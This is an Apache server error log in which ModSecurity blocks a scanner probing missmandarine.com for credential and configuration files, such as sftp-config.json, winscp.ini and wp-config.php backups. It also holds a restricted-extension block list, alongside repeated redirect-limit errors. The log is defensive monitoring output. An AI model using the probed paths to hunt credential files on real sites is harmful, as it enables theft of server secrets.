[Mon May 11 18:56:05.857731 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKJZYn-x0CHsbEbP1_cwAAAJA"]
[Mon May 11 18:56:06.267334 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /public/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/public/sftp-config.json"] [unique_id "agIKJpYn-x0CHsbEbP1_dgAAAJA"]
[Mon May 11 18:56:06.267564 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/public/sftp-config.json"] [unique_id "agIKJpYn-x0CHsbEbP1_dgAAAJA"]
[Mon May 11 18:56:06.320672 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKJpYn-x0CHsbEbP1_dgAAAJA"]
[Mon May 11 18:56:07.203452 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /api/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/sftp-config.json"] [unique_id "agIKJ5Yn-x0CHsbEbP1_ewAAAJA"]
[Mon May 11 18:56:07.203678 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/sftp-config.json"] [unique_id "agIKJ5Yn-x0CHsbEbP1_ewAAAJA"]
[Mon May 11 18:56:07.259297 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKJ5Yn-x0CHsbEbP1_ewAAAJA"]
[Mon May 11 18:56:07.437472 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /backend/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/backend/sftp-config.json"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fAAAAJA"]
[Mon May 11 18:56:07.437696 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/backend/sftp-config.json"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fAAAAJA"]
[Mon May 11 18:56:07.498787 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fAAAAJA"]
[Mon May 11 18:56:07.909146 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "missmandarine.com"] [uri "/winscp.ini"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fgAAAJA"]
[Mon May 11 18:56:07.909545 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/winscp.ini"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fgAAAJA"]
[Mon May 11 18:56:07.964756 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKJ5Yn-x0CHsbEbP1_fgAAAJA"]
[Mon May 11 18:56:13.987143 2026] [core:error] [pid 1424905:tid 1424915] [client 85.11.167.49:57863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:13.987454 2026] [core:error] [pid 1424905:tid 1424915] [client 85.11.167.49:57863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:18.726232 2026] [core:error] [pid 1501883:tid 1501894] [client 85.11.167.49:65524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:18.726272 2026] [core:error] [pid 1501883:tid 1501894] [client 85.11.167.49:65524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:23.372695 2026] [core:error] [pid 1501883:tid 1501900] [client 85.11.167.49:60979] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:23.372737 2026] [core:error] [pid 1501883:tid 1501900] [client 85.11.167.49:60979] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:27.327899 2026] [core:error] [pid 1424905:tid 1424932] [client 85.11.167.49:54922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:27.327935 2026] [core:error] [pid 1424905:tid 1424932] [client 85.11.167.49:54922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:30.377872 2026] [core:error] [pid 1501831:tid 1501844] [client 85.11.167.49:52002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:30.377914 2026] [core:error] [pid 1501831:tid 1501844] [client 85.11.167.49:52002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:31.631487 2026] [core:error] [pid 1424905:tid 1424913] [client 85.11.167.49:54769] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:31.631521 2026] [core:error] [pid 1424905:tid 1424913] [client 85.11.167.49:54769] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:34.302063 2026] [core:error] [pid 1424905:tid 1424917] [client 85.11.167.49:58561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:34.302101 2026] [core:error] [pid 1424905:tid 1424917] [client 85.11.167.49:58561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:35.586699 2026] [core:error] [pid 1501883:tid 1501899] [client 85.11.167.49:59486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:35.586722 2026] [core:error] [pid 1501883:tid 1501899] [client 85.11.167.49:59486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:38.736003 2026] [core:error] [pid 1501883:tid 1501905] [client 85.11.167.49:49592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:38.736041 2026] [core:error] [pid 1501883:tid 1501905] [client 85.11.167.49:49592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:40.445338 2026] [core:error] [pid 1424905:tid 1424930] [client 85.11.167.49:54427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:40.445373 2026] [core:error] [pid 1424905:tid 1424930] [client 85.11.167.49:54427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:42.725485 2026] [core:error] [pid 1501883:tid 1501908] [client 85.11.167.49:57632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:42.725518 2026] [core:error] [pid 1501883:tid 1501908] [client 85.11.167.49:57632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:44.218754 2026] [core:error] [pid 1416109:tid 1416140] [client 85.11.167.49:63353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:44.218792 2026] [core:error] [pid 1416109:tid 1416140] [client 85.11.167.49:63353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:56:44.227148 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php.bak"] [unique_id "agIKTDP5Q_-MBliRCAw8uAAAAAI"]
[Mon May 11 18:56:44.227402 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php.bak"] [unique_id "agIKTDP5Q_-MBliRCAw8uAAAAAI"]
[Mon May 11 18:56:44.282467 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTDP5Q_-MBliRCAw8uAAAAAI"]
[Mon May 11 18:56:44.458364 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php.save"] [unique_id "agIKTDP5Q_-MBliRCAw8ugAAAAI"]
[Mon May 11 18:56:44.458611 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php.save"] [unique_id "agIKTDP5Q_-MBliRCAw8ugAAAAI"]
[Mon May 11 18:56:44.514767 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTDP5Q_-MBliRCAw8ugAAAAI"]
[Mon May 11 18:56:44.691983 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php.swp"] [unique_id "agIKTDP5Q_-MBliRCAw8vQAAAAI"]
[Mon May 11 18:56:44.692258 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php.swp"] [unique_id "agIKTDP5Q_-MBliRCAw8vQAAAAI"]
[Mon May 11 18:56:44.748696 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTDP5Q_-MBliRCAw8vQAAAAI"]
[Mon May 11 18:56:44.925489 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.txt found within REQUEST_FILENAME: /wp-config.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.txt"] [unique_id "agIKTDP5Q_-MBliRCAw8vgAAAAI"]
[Mon May 11 18:56:44.925737 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.txt"] [unique_id "agIKTDP5Q_-MBliRCAw8vgAAAAI"]
[Mon May 11 18:56:44.983204 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTDP5Q_-MBliRCAw8vgAAAAI"]
[Mon May 11 18:56:45.163527 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/wp-config.php~"] [unique_id "agIKTTP5Q_-MBliRCAw8vwAAAAI"]
[Mon May 11 18:56:45.163769 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/wp-config.php~"] [unique_id "agIKTTP5Q_-MBliRCAw8vwAAAAI"]
[Mon May 11 18:56:45.221370 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKTTP5Q_-MBliRCAw8vwAAAAI"]
[Mon May 11 18:56:45.397137 2026] [security2:error] [pid 1501883:tid 1501887] [client 108.136.162.67:54813] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "missmandarine.com"] [uri "/wp-config.old"] [unique_id "agIKTTP5Q_-MBliRCAw8wQAAAAI"]
